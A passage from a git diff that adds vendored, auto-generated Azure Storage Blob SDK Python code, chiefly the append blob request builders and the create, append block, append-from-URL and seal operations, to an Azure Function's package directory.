'str') + if encryption_algorithm is not None: + _header_parameters['x-ms-encryption-algorithm'] = _SERIALIZER.header("encryption_algorithm", encryption_algorithm, 'str') + if encryption_scope is not None: + _header_parameters['x-ms-encryption-scope'] = _SERIALIZER.header("encryption_scope", encryption_scope, 'str') + if lease_id is not None: + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + if max_size is not None: + _header_parameters['x-ms-blob-condition-maxsize'] = _SERIALIZER.header("max_size", max_size, 'long') + if append_position is not None: + _header_parameters['x-ms-blob-condition-appendpos'] = _SERIALIZER.header("append_position", append_position, 'long') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + if if_match is not None: + _header_parameters['If-Match'] = _SERIALIZER.header("if_match", if_match, 'str') + if if_none_match is not None: + _header_parameters['If-None-Match'] = _SERIALIZER.header("if_none_match", if_none_match, 'str') + if if_tags is not None: + _header_parameters['x-ms-if-tags'] = _SERIALIZER.header("if_tags", if_tags, 'str') + if source_if_modified_since is not None: + _header_parameters['x-ms-source-if-modified-since'] = _SERIALIZER.header("source_if_modified_since", source_if_modified_since, 'rfc-1123') + if source_if_unmodified_since is not None: + _header_parameters['x-ms-source-if-unmodified-since'] = _SERIALIZER.header("source_if_unmodified_since", source_if_unmodified_since, 'rfc-1123') + if source_if_match is not None: + _header_parameters['x-ms-source-if-match'] = _SERIALIZER.header("source_if_match", source_if_match, 'str') + if source_if_none_match is not None: + _header_parameters['x-ms-source-if-none-match'] = _SERIALIZER.header("source_if_none_match", source_if_none_match, 'str') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + if copy_source_authorization is not None: + _header_parameters['x-ms-copy-source-authorization'] = _SERIALIZER.header("copy_source_authorization", copy_source_authorization, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_seal_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + comp = kwargs.pop('comp', "seal") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + timeout = kwargs.pop('timeout', None) # type: Optional[int] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + lease_id = kwargs.pop('lease_id', None) # type: Optional[str] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + if_match = kwargs.pop('if_match', None) # type: Optional[str] + if_none_match = kwargs.pop('if_none_match', None) # type: Optional[str] + append_position = kwargs.pop('append_position', None) # type: Optional[int] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + if lease_id is not None: + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + if if_match is not None: + _header_parameters['If-Match'] = _SERIALIZER.header("if_match", if_match, 'str') + if if_none_match is not None: + _header_parameters['If-None-Match'] = _SERIALIZER.header("if_none_match", if_none_match, 'str') + if append_position is not None: + _header_parameters['x-ms-blob-condition-appendpos'] = _SERIALIZER.header("append_position", append_position, 'long') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + +# fmt: on +class AppendBlobOperations(object): + """ + .. warning:: + **DO NOT** instantiate this class directly. + + Instead, you should access the following operations through + :class:`~azure.storage.blob.AzureBlobStorage`'s + :attr:`append_blob` attribute. + """ + + models = _models + + def __init__(self, *args, **kwargs): + args = list(args) + self._client = args.pop(0) if args else kwargs.pop("client") + self._config = args.pop(0) if args else kwargs.pop("config") + self._serialize = args.pop(0) if args else kwargs.pop("serializer") + self._deserialize = args.pop(0) if args else kwargs.pop("deserializer") + + + @distributed_trace + def create( # pylint: disable=inconsistent-return-statements + self, + content_length, # type: int + timeout=None, # type: Optional[int] + metadata=None, # type: Optional[Dict[str, str]] + request_id_parameter=None, # type: Optional[str] + blob_tags_string=None, # type: Optional[str] + immutability_policy_expiry=None, # type: Optional[datetime.datetime] + immutability_policy_mode=None, # type: Optional[Union[str, "_models.BlobImmutabilityPolicyMode"]] + legal_hold=None, # type: Optional[bool] + blob_http_headers=None, # type: Optional["_models.BlobHTTPHeaders"] + lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"] + cpk_info=None, # type: Optional["_models.CpkInfo"] + cpk_scope_info=None, # type: Optional["_models.CpkScopeInfo"] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """The Create Append Blob operation creates a new append blob. + + :param content_length: The length of the request. + :type content_length: long + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param metadata: Optional. Specifies a user-defined name-value pair associated with the blob. + If no name-value pairs are specified, the operation will copy the metadata from the source blob + or file to the destination blob. If one or more name-value pairs are specified, the destination + blob is created with the specified metadata, and metadata is not copied from the source blob or + file. Note that beginning with version 2009-09-19, metadata names must adhere to the naming + rules for C# identifiers. See Naming and Referencing Containers, Blobs, and Metadata for more + information. Default value is None. + :type metadata: dict[str, str] + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param blob_tags_string: Optional. Used to set blob tags in various blob operations. Default + value is None. + :type blob_tags_string: str + :param immutability_policy_expiry: Specifies the date time when the blobs immutability policy + is set to expire. Default value is None. + :type immutability_policy_expiry: ~datetime.datetime + :param immutability_policy_mode: Specifies the immutability policy mode to set on the blob. + Default value is None. + :type immutability_policy_mode: str or ~azure.storage.blob.models.BlobImmutabilityPolicyMode + :param legal_hold: Specified if a legal hold should be set on the blob. Default value is None. + :type legal_hold: bool + :param blob_http_headers: Parameter group. Default value is None. + :type blob_http_headers: ~azure.storage.blob.models.BlobHTTPHeaders + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param cpk_info: Parameter group. Default value is None. + :type cpk_info: ~azure.storage.blob.models.CpkInfo + :param cpk_scope_info: Parameter group. Default value is None. + :type cpk_scope_info: ~azure.storage.blob.models.CpkScopeInfo + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword blob_type: Specifies the type of blob to create: block blob, page blob, or append + blob. Default value is "AppendBlob". Note that overriding this default value may result in + unsupported behavior. + :paramtype blob_type: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + blob_type = kwargs.pop('blob_type', "AppendBlob") # type: str + + _blob_content_type = None + _blob_content_encoding = None + _blob_content_language = None + _blob_content_md5 = None + _blob_cache_control = None + _lease_id = None + _blob_content_disposition = None + _encryption_key = None + _encryption_key_sha256 = None + _encryption_algorithm = None + _encryption_scope = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if blob_http_headers is not None: + _blob_content_type = blob_http_headers.blob_content_type + _blob_content_encoding = blob_http_headers.blob_content_encoding + _blob_content_language = blob_http_headers.blob_content_language + _blob_content_md5 = blob_http_headers.blob_content_md5 + _blob_cache_control = blob_http_headers.blob_cache_control + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if blob_http_headers is not None: + _blob_content_disposition = blob_http_headers.blob_content_disposition + if cpk_info is not None: + _encryption_key = cpk_info.encryption_key + _encryption_key_sha256 = cpk_info.encryption_key_sha256 + _encryption_algorithm = cpk_info.encryption_algorithm + if cpk_scope_info is not None: + _encryption_scope = cpk_scope_info.encryption_scope + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + + request = build_create_request( + url=self._config.url, + blob_type=blob_type, + version=self._config.version, + content_length=content_length, + timeout=timeout, + blob_content_type=_blob_content_type, + blob_content_encoding=_blob_content_encoding, + blob_content_language=_blob_content_language, + blob_content_md5=_blob_content_md5, + blob_cache_control=_blob_cache_control, + metadata=metadata, + lease_id=_lease_id, + blob_content_disposition=_blob_content_disposition, + encryption_key=_encryption_key, + encryption_key_sha256=_encryption_key_sha256, + encryption_algorithm=_encryption_algorithm, + encryption_scope=_encryption_scope, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + blob_tags_string=blob_tags_string, + immutability_policy_expiry=immutability_policy_expiry, + immutability_policy_mode=immutability_policy_mode, + legal_hold=legal_hold, + template_url=self.create.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [201]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['x-ms-version-id']=self._deserialize('str', response.headers.get('x-ms-version-id')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-request-server-encrypted']=self._deserialize('bool', response.headers.get('x-ms-request-server-encrypted')) + response_headers['x-ms-encryption-key-sha256']=self._deserialize('str', response.headers.get('x-ms-encryption-key-sha256')) + response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + create.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace + def append_block( # pylint: disable=inconsistent-return-statements + self, + content_length, # type: int + body, # type: IO + timeout=None, # type: Optional[int] + transactional_content_md5=None, # type: Optional[bytearray] + transactional_content_crc64=None, # type: Optional[bytearray] + request_id_parameter=None, # type: Optional[str] + lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"] + append_position_access_conditions=None, # type: Optional["_models.AppendPositionAccessConditions"] + cpk_info=None, # type: Optional["_models.CpkInfo"] + cpk_scope_info=None, # type: Optional["_models.CpkScopeInfo"] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """The Append Block operation commits a new block of data to the end of an existing append blob. + The Append Block operation is permitted only if the blob was created with x-ms-blob-type set to + AppendBlob. Append Block is supported only on version 2015-02-21 version or later. + + :param content_length: The length of the request. + :type content_length: long + :param body: Initial data. + :type body: IO + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param transactional_content_md5: Specify the transactional md5 for the body, to be validated + by the service. Default value is None. + :type transactional_content_md5: bytearray + :param transactional_content_crc64: Specify the transactional crc64 for the body, to be + validated by the service. Default value is None. + :type transactional_content_crc64: bytearray + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param append_position_access_conditions: Parameter group. Default value is None. + :type append_position_access_conditions: + ~azure.storage.blob.models.AppendPositionAccessConditions + :param cpk_info: Parameter group. Default value is None. + :type cpk_info: ~azure.storage.blob.models.CpkInfo + :param cpk_scope_info: Parameter group. Default value is None. + :type cpk_scope_info: ~azure.storage.blob.models.CpkScopeInfo + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "appendblock". Note that overriding this default value + may result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "appendblock") # type: str + content_type = kwargs.pop('content_type', "application/octet-stream") # type: Optional[str] + + _lease_id = None + _max_size = None + _append_position = None + _encryption_key = None + _encryption_key_sha256 = None + _encryption_algorithm = None + _encryption_scope = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if append_position_access_conditions is not None: + _max_size = append_position_access_conditions.max_size + _append_position = append_position_access_conditions.append_position + if cpk_info is not None: + _encryption_key = cpk_info.encryption_key + _encryption_key_sha256 = cpk_info.encryption_key_sha256 + _encryption_algorithm = cpk_info.encryption_algorithm + if cpk_scope_info is not None: + _encryption_scope = cpk_scope_info.encryption_scope + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + _content = body + + request = build_append_block_request( + url=self._config.url, + comp=comp, + version=self._config.version, + content_type=content_type, + content=_content, + content_length=content_length, + timeout=timeout, + transactional_content_md5=transactional_content_md5, + transactional_content_crc64=transactional_content_crc64, + lease_id=_lease_id, + max_size=_max_size, + append_position=_append_position, + encryption_key=_encryption_key, + encryption_key_sha256=_encryption_key_sha256, + encryption_algorithm=_encryption_algorithm, + encryption_scope=_encryption_scope, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + template_url=self.append_block.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [201]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5')) + response_headers['x-ms-content-crc64']=self._deserialize('bytearray', response.headers.get('x-ms-content-crc64')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-blob-append-offset']=self._deserialize('str', response.headers.get('x-ms-blob-append-offset')) + response_headers['x-ms-blob-committed-block-count']=self._deserialize('int', response.headers.get('x-ms-blob-committed-block-count')) + response_headers['x-ms-request-server-encrypted']=self._deserialize('bool', response.headers.get('x-ms-request-server-encrypted')) + response_headers['x-ms-encryption-key-sha256']=self._deserialize('str', response.headers.get('x-ms-encryption-key-sha256')) + response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + append_block.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace + def append_block_from_url( # pylint: disable=inconsistent-return-statements + self, + source_url, # type: str + content_length, # type: int + source_range=None, # type: Optional[str] + source_content_md5=None, # type: Optional[bytearray] + source_contentcrc64=None, # type: Optional[bytearray] + timeout=None, # type: Optional[int] + transactional_content_md5=None, # type: Optional[bytearray] + request_id_parameter=None, # type: Optional[str] + copy_source_authorization=None, # type: Optional[str] + cpk_info=None, # type: Optional["_models.CpkInfo"] + cpk_scope_info=None, # type: Optional["_models.CpkScopeInfo"] + lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"] + append_position_access_conditions=None, # type: Optional["_models.AppendPositionAccessConditions"] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + source_modified_access_conditions=None, # type: Optional["_models.SourceModifiedAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """The Append Block operation commits a new block of data to the end of an existing append blob + where the contents are read from a source url. The Append Block operation is permitted only if + the blob was created with x-ms-blob-type set to AppendBlob. Append Block is supported only on + version 2015-02-21 version or later. + + :param source_url: Specify a URL to the copy source. + :type source_url: str + :param content_length: The length of the request. + :type content_length: long + :param source_range: Bytes of source data in the specified range. Default value is None. + :type source_range: str + :param source_content_md5: Specify the md5 calculated for the range of bytes that must be read + from the copy source. Default value is None. + :type source_content_md5: bytearray + :param source_contentcrc64: Specify the crc64 calculated for the range of bytes that must be + read from the copy source. Default value is None. + :type source_contentcrc64: bytearray + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param transactional_content_md5: Specify the transactional md5 for the body, to be validated + by the service. Default value is None. + :type transactional_content_md5: bytearray + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param copy_source_authorization: Only Bearer type is supported. Credentials should be a valid + OAuth access token to copy source. Default value is None. + :type copy_source_authorization: str + :param cpk_info: Parameter group. Default value is None. + :type cpk_info: ~azure.storage.blob.models.CpkInfo + :param cpk_scope_info: Parameter group. Default value is None. + :type cpk_scope_info: ~azure.storage.blob.models.CpkScopeInfo + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param append_position_access_conditions: Parameter group. Default value is None. + :type append_position_access_conditions: + ~azure.storage.blob.models.AppendPositionAccessConditions + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :param source_modified_access_conditions: Parameter group. Default value is None. + :type source_modified_access_conditions: + ~azure.storage.blob.models.SourceModifiedAccessConditions + :keyword comp: comp. Default value is "appendblock". Note that overriding this default value + may result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "appendblock") # type: str + + _encryption_key = None + _encryption_key_sha256 = None + _encryption_algorithm = None + _encryption_scope = None + _lease_id = None + _max_size = None + _append_position = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + _source_if_modified_since = None + _source_if_unmodified_since = None + _source_if_match = None + _source_if_none_match = None + if cpk_info is not None: + _encryption_key = cpk_info.encryption_key + _encryption_key_sha256 = cpk_info.encryption_key_sha256 + _encryption_algorithm = cpk_info.encryption_algorithm + if cpk_scope_info is not None: + _encryption_scope = cpk_scope_info.encryption_scope + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if append_position_access_conditions is not None: + _max_size = append_position_access_conditions.max_size + _append_position = append_position_access_conditions.append_position + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + if source_modified_access_conditions is not None: + _source_if_modified_since = source_modified_access_conditions.source_if_modified_since + _source_if_unmodified_since = source_modified_access_conditions.source_if_unmodified_since + _source_if_match = source_modified_access_conditions.source_if_match + _source_if_none_match = source_modified_access_conditions.source_if_none_match + + request = build_append_block_from_url_request( + url=self._config.url, + comp=comp, + version=self._config.version, + source_url=source_url, + content_length=content_length, + source_range=source_range, + source_content_md5=source_content_md5, + source_contentcrc64=source_contentcrc64, + timeout=timeout, + transactional_content_md5=transactional_content_md5, + encryption_key=_encryption_key, + encryption_key_sha256=_encryption_key_sha256, + encryption_algorithm=_encryption_algorithm, + encryption_scope=_encryption_scope, + lease_id=_lease_id, + max_size=_max_size, + append_position=_append_position, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + source_if_modified_since=_source_if_modified_since, + source_if_unmodified_since=_source_if_unmodified_since, + source_if_match=_source_if_match, + source_if_none_match=_source_if_none_match, + request_id_parameter=request_id_parameter, + copy_source_authorization=copy_source_authorization, + template_url=self.append_block_from_url.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [201]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5')) + response_headers['x-ms-content-crc64']=self._deserialize('bytearray', response.headers.get('x-ms-content-crc64')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-blob-append-offset']=self._deserialize('str', response.headers.get('x-ms-blob-append-offset')) + response_headers['x-ms-blob-committed-block-count']=self._deserialize('int', response.headers.get('x-ms-blob-committed-block-count')) + response_headers['x-ms-encryption-key-sha256']=self._deserialize('str', response.headers.get('x-ms-encryption-key-sha256')) + response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope')) + response_headers['x-ms-request-server-encrypted']=self._deserialize('bool', response.headers.get('x-ms-request-server-encrypted')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + append_block_from_url.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace + def seal( # pylint: disable=inconsistent-return-statements + self, + timeout=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + append_position_access_conditions=None, # type: Optional["_models.AppendPositionAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """The Seal operation seals the Append Blob to make it read-only. Seal is supported only on + version 2019-12-12 version or later. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :param append_position_access_conditions: Parameter group. Default value is None. + :type append_position_access_conditions: + ~azure.storage.blob.models.AppendPositionAccessConditions + :keyword comp: comp. Default value is "seal". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "seal") # type: str + + _lease_id = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _append_position = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + if append_position_access_conditions is not None: + _append_position = append_position_access_conditions.append_position + + request = build_seal_request( + url=self._config.url, + comp=comp, + version=self._config.version, + timeout=timeout, + request_id_parameter=request_id_parameter, + lease_id=_lease_id, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + append_position=_append_position, + template_url=self.seal.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-blob-sealed']=self._deserialize('bool', response.headers.get('x-ms-blob-sealed')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + seal.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/_blob_operations.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/_blob_operations.py new file mode 100644 index 0000000..fbd0b9a --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/_blob_operations.py @@ -0,0 +1,4443 @@ +# pylint: disable=too-many-lines +# coding=utf-8 +# -------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for license information. +# Code generated by Microsoft (R) AutoRest Code Generator. +# Changes may cause incorrect behavior and will be lost if the code is regenerated. +# -------------------------------------------------------------------------- +import datetime +from typing import TYPE_CHECKING + +from msrest import Serializer + +from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error +from azure.core.pipeline import PipelineResponse +from azure.core.pipeline.transport import HttpResponse +from azure.core.rest import HttpRequest +from azure.core.tracing.decorator import distributed_trace + +from .. import models as _models +from .._vendor import _convert_request, _format_url_section + +if TYPE_CHECKING: + # pylint: disable=unused-import,ungrouped-imports + from typing import Any, Callable, Dict, IO, Optional, TypeVar, Union + T = TypeVar('T') + ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]] + +_SERIALIZER = Serializer() +_SERIALIZER.client_side_validation = False +# fmt: off + +def build_download_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + version = kwargs.pop('version', "2021-04-10") # type: str + snapshot = kwargs.pop('snapshot', None) # type: Optional[str] + version_id = 